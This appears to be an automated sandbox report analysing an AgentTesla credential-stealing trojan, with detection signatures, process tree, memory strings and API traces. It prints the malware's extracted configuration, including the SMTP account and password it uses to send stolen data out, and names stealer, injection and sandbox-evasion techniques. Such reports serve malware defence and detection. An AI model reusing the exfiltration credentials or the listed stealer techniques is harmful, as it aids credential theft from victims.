Loading ...

Play interactive tourEdit tour

Windows Analysis Report O53TFikPkp

Overview

General Information

Sample Name:O53TFikPkp (renamed file extension from none to exe)
Analysis ID:552998
MD5:be56d049ee926fbccec623695d12a5c6
SHA1:1fa7ea2d0e348b7e1d79a7e6426e6f10376238e4
SHA256:626213dec6f5f7c552974fc4d9fe954cb70b94f03588aa4550cd545789034167
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Moves itself to temp directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • O53TFikPkp.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\O53TFikPkp.exe" MD5: BE56D049EE926FBCCEC623695D12A5C6)
    • O53TFikPkp.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\O53TFikPkp.exe" MD5: BE56D049EE926FBCCEC623695D12A5C6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "mailfilter247@yandex.com", "Password": "daddyhandsome@1234", "Host": "smtp.yandex.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000002.00000002.923015296.0000000000549000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.O53TFikPkp.exe.25e0000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.2.O53TFikPkp.exe.25e0000.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                2.1.O53TFikPkp.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.1.O53TFikPkp.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    2.0.O53TFikPkp.exe.415058.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 53 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 2.0.O53TFikPkp.exe.400000.6.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "mailfilter247@yandex.com", "Password": "daddyhandsome@1234", "Host": "smtp.yandex.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: O53TFikPkp.exeVirustotal: Detection: 51%Perma Link
                      Source: O53TFikPkp.exeReversingLabs: Detection: 53%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dllReversingLabs: Detection: 40%
                      Machine Learning detection for sampleShow sources
                      Source: O53TFikPkp.exeJoe Sandbox ML: detected
                      Source: 2.0.O53TFikPkp.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.2.O53TFikPkp.exe.4970000.5.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.2.O53TFikPkp.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.O53TFikPkp.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.O53TFikPkp.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.1.O53TFikPkp.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.O53TFikPkp.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.O53TFikPkp.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.O53TFikPkp.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 2.0.O53TFikPkp.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8

                      Compliance:

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeUnpacked PE file: 2.2.O53TFikPkp.exe.4970000.5.unpack
                      Source: O53TFikPkp.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: Binary string: wntdll.pdbUGP source: O53TFikPkp.exe, 00000001.00000003.660492913.00000000032F0000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000001.00000003.658708230.0000000003160000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: O53TFikPkp.exe, 00000001.00000003.660492913.00000000032F0000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000001.00000003.658708230.0000000003160000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00404A29 FindFirstFileExW,2_2_00404A29
                      Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
                      Source: global trafficTCP traffic: 192.168.2.4:49803 -> 77.88.21.158:587
                      Source: global trafficTCP traffic: 192.168.2.4:49803 -> 77.88.21.158:587
                      Source: O53TFikPkp.exe, 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: O53TFikPkp.exe, 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: O53TFikPkp.exe, 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://UbQjJM.com
                      Source: O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ca.crl0h
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925621657.0000000005A90000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
                      Source: O53TFikPkp.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                      Source: O53TFikPkp.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ca.cer09
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925621657.0000000005A90000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ycasha2.cer0
                      Source: O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://smtp.yandex.com
                      Source: O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certu
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com0.
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://www.certum.pl/CPS0
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925621657.0000000005A90000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925621657.0000000005A90000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: http://yandex.ocsp-responder.com03
                      Source: O53TFikPkp.exe, 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: O53TFikPkp.exe, 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: O53TFikPkp.exe, 00000002.00000002.924375629.00000000029A5000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924396051.00000000029AD000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.888941433.0000000005151000.00000004.00000001.sdmpString found in binary or memory: https://bbTPeNUsMvT4JktW3MN.com
                      Source: O53TFikPkp.exe, 00000002.00000003.906856475.0000000005AD6000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905948236.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925666483.0000000005AC2000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.925621657.0000000005A90000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924286996.0000000002981000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000003.905834271.0000000005AD4000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924446366.00000000029C3000.00000004.00000001.sdmpString found in binary or memory: https://www.certum.pl/CPS0
                      Source: O53TFikPkp.exe, O53TFikPkp.exe, 00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.923912577.00000000025E0000.00000004.00020000.sdmp, O53TFikPkp.exe, 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, O53TFikPkp.exe, 00000002.00000002.924840687.0000000004972000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: O53TFikPkp.exe, 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: smtp.yandex.com
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404F61

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 2.2.O53TFikPkp.exe.4970000.5.unpack, u003cPrivateImplementationDetailsu003eu007b2A2AA767u002d7D90u002d43DEu002dACF4u002d870AEC55D6EBu007d/u003631AE4A7u002dA1C6u002d4422u002d8C60u002d7447CA07753B.csLarge array initialization: .cctor: array initializer size 11961
                      Source: O53TFikPkp.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_00403225
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_0040604C1_2_0040604C
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_004047721_2_00404772
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0040A2A52_2_0040A2A5
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_004648402_2_00464840
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00464C782_2_00464C78
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00461DD82_2_00461DD8
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0046EA602_2_0046EA60
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0046AC202_2_0046AC20
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00466CB02_2_00466CB0
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0046C75F2_2_0046C75F
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0046C7C02_2_0046C7C0
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_007161382_2_00716138
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0071F1382_2_0071F138
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00715B012_2_00715B01
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0071D8582_2_0071D858
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_008CE2002_2_008CE200
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_008C04F62_2_008C04F6
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_008C89902_2_008C8990
                      Source: O53TFikPkp.exe, 00000001.00000003.658828325.0000000003276000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000001.00000003.662197259.000000000340F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000001.00000002.667167111.00000000022B0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGHVfffxRlZmplFWkRRUtYKzwxFM.exe4 vs O53TFikPkp.exe
                      Source: O53TFikPkp.exeBinary or memory string: OriginalFilename vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameGHVfffxRlZmplFWkRRUtYKzwxFM.exe4 vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameGHVfffxRlZmplFWkRRUtYKzwxFM.exe4 vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000002.00000002.923912577.00000000025E0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameGHVfffxRlZmplFWkRRUtYKzwxFM.exe4 vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameGHVfffxRlZmplFWkRRUtYKzwxFM.exe4 vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000002.00000002.924840687.0000000004972000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameGHVfffxRlZmplFWkRRUtYKzwxFM.exe4 vs O53TFikPkp.exe
                      Source: O53TFikPkp.exe, 00000002.00000002.922757502.0000000000199000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs O53TFikPkp.exe
                      Source: O53TFikPkp.exeVirustotal: Detection: 51%
                      Source: O53TFikPkp.exeReversingLabs: Detection: 53%
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile read: C:\Users\user\Desktop\O53TFikPkp.exeJump to behavior
                      Source: O53TFikPkp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\O53TFikPkp.exe "C:\Users\user\Desktop\O53TFikPkp.exe"
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess created: C:\Users\user\Desktop\O53TFikPkp.exe "C:\Users\user\Desktop\O53TFikPkp.exe"
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeProcess created: C:\Users\user\Desktop\O53TFikPkp.exe "C:\Users\user\Desktop\O53TFikPkp.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile created: C:\Users\user\AppData\Roaming\yf3kqygs.3juJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile created: C:\Users\user\AppData\Local\Temp\nsr28ED.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/5@4/1
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404275
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_00401489
                      Source: 2.2.O53TFikPkp.exe.4970000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.2.O53TFikPkp.exe.4970000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: wntdll.pdbUGP source: O53TFikPkp.exe, 00000001.00000003.660492913.00000000032F0000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000001.00000003.658708230.0000000003160000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: O53TFikPkp.exe, 00000001.00000003.660492913.00000000032F0000.00000004.00000001.sdmp, O53TFikPkp.exe, 00000001.00000003.658708230.0000000003160000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeUnpacked PE file: 2.2.O53TFikPkp.exe.4970000.5.unpack
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_72B21000 push eax; ret 1_2_72B2102E
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00401F16 push ecx; ret 2_2_00401F29
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_00469848 push 000045CAh; retf 0045h2_2_0046984D
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0071B557 push edi; retn 0000h2_2_0071B559
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0071D2E9 push eax; retf 0071h2_2_0071D39D
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 2_2_0071D3A0 push eax; retf 0071h2_2_0071D3A1
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
                      Source: C:\Users\user\Desktop\O53TFikPkp.exeFile created: C:\Users\user\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Moves itself to temp directoryShow sources
                      Source: c:\users\user\desktop\o53tfikpkp.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG377.tmpJump to behavior
